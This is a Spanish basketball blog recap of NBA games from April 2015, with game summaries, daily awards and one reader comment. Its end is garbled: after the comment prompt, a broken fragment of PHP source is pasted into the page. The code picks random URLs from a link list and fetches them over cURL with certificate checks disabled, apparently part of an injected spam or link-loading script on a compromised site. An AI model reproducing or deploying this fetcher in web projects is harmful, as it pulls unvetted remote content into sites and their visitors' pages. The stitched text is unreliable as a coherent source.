La Crónica: Victoria psicológica

01 de April de 2015 por MagicJohnson32

El pique entre Warriors y Clippers vivió anoche un nuevo episodio, y no podemos más que desear un cruce de Playoffs entre dos equipos que no disimulan que se detestan mútuamente. La madrugada dejó resultados más importantes en cuanto a consecuencias en la clasificación, entre ellos el del partido que enfrentaba a Pacers y Nets. También hubo reedición de las pasadas Finales y una sorpresa en Detroit.

Os lo contamos todo a continuación.

Golden State Warriors 110 – LA Clippers 106

Warriors y Clippers ensayaron anoche la que perfectamente podría ser una de las semifinales del Oeste en estos próximos Playoffs. No fue el partido más brillante de los Warriors, que se presentaban en L.A. con la baja de Draymond Green, y aun así salieron del Staples Center vencedores tras remontar 17 puntos y sobreponerse a la espectacular actuación de Blake Griffin. El PF demostró estar completamente recuperado de su reciente lesión y aprovechó la ausencia de Green, sustituido en el quinteto inicial por David Lee, para dispararse hasta los 40 puntos, 12 rebotes, 5 asistencias y 3 tapones. También cumplió Chris Paul, que dirigió a los suyos con 27 puntos y 9 asistencias, pero los Warriors no solo contaron con la aportación anotadora habitual de los Splash Bros (27 de Curry y 25 de Thompson), sino que además demostraron una mayor profundidad de plantilla con 34 puntos de los suplentes, por sólo 12 del banquillo angelino. Así, tirando de recursos, superaron los Warriors la complicada prueba que supuso un Staples con ambiente de Playoffs y se llevaron una victoria con más ascendencia en lo psicológico que en cualquier otro aspecto.

Resto de la jornada

Sí había mucho en juego entre Pacers y Nets, dos de los implicados en la lucha por los últimos billetes para Playoffs en el Este. El resultado, victoria de los Nets (106-111), extiende  las inercias de unos y otros y sirve para confirmar a Brook Lopez como uno de los jugadores más decisivos del tramo final de regular season. También fue determinante Kawhi Leonard en Miami, donde los Spurs se impusieron (95-81) en un duelo que difícilmente recuerda ya a las Finales de las dos últimas campañas. En Detroit, Budenholzer salió con todos los titulares pero no pareció que los Hawks estuviesen muy por la faena de superar a los Pistons. Los de SVG, comandados por Andre Drummond, se llevaron una victoria de mérito (95-105) dado que Reggie Jackson jugó enfermo y siguen sin poder contar con Greg Monroe.

PREMIOS

MVP: No hay quien pare a Brook Lopez. 11 de 17 en TC, 11 rebotes, 2 asistencias y 2 tapones logró el de los Nets ante un excelente defensor como Roy Hibbert. Destaquemos también a Kawhi Leonard, que volvió a frustrar a los Heat haciendo de todo (y bien). 22 puntos, 9 rebotes, 3 asistencias, 4 robos y 2 tapones del multiusos de Popovich.

Rookie: Dado el escaso protagonismo de los novatos, a Markel Brown le basta con sus 10 puntos, 5 rebotes, 1 asistencia y 1 robo para llevarse el premio al rookie del día.

Sorpresa: No son frecuentes las ocasiones en las que uno puede escribir que Thabo Sefolosha fue el máximo anotador de su equipo. El suizo metió 19 puntos, con 5 rebotes, 2 asistencias y 1 robo para ser el mejor de los suyos en Detroit. Y así le fue a los Hawks, claro. En ese mismo partido, John Lucas III dio un paso al frente ante los problemas de salud que limitaron a Reggie Jackson, y contribuyó con 15 puntos, 3 asistencias y 2 robos.

Decepción: Tantas veces fundamental como sexto hombre de Vogel, anoche Rodney Stuckey dio la de arena al fallar 7 de sus 8 tiros de campo y no aportar más que 4 puntos, 2 rebotes y 1 asistencia.

Mayor esfuerzo en vano: 16 de 25 en tiros de campo y 8 de 8 en libres para 40 puntos, además de 12 rebotes, 5 asistencias y 3 tapones. La aportación de Griffin ante los Warriors no valió una victoria pero sí este reconocimiento.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. Ruxixón dice:
    #1

    En el mejor momento de su carrera Brook Lopez.No sé si la suplencia le ha activado o qué,pero su nivel de ahora,constante,no lo ha tenido en su carrera.Y gracias a él se están sosteniendo las esperanzas “Brooklyanas” de PO.

    Iba a defender a otro de mis denostados,CP3,con su imagen por los suelos siendo motivo de burla desde buena mañana en Twitter,pensando que había caído al pisar a Curry pero me ha dado por revisar el vídeo con más detenimiento y hay un pasito de Curry que es justo el que se come Paul y hace que se vaya al suelo.Dejando al margen esto,que mal se llevan estos dos equipos,como mola,jaja.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>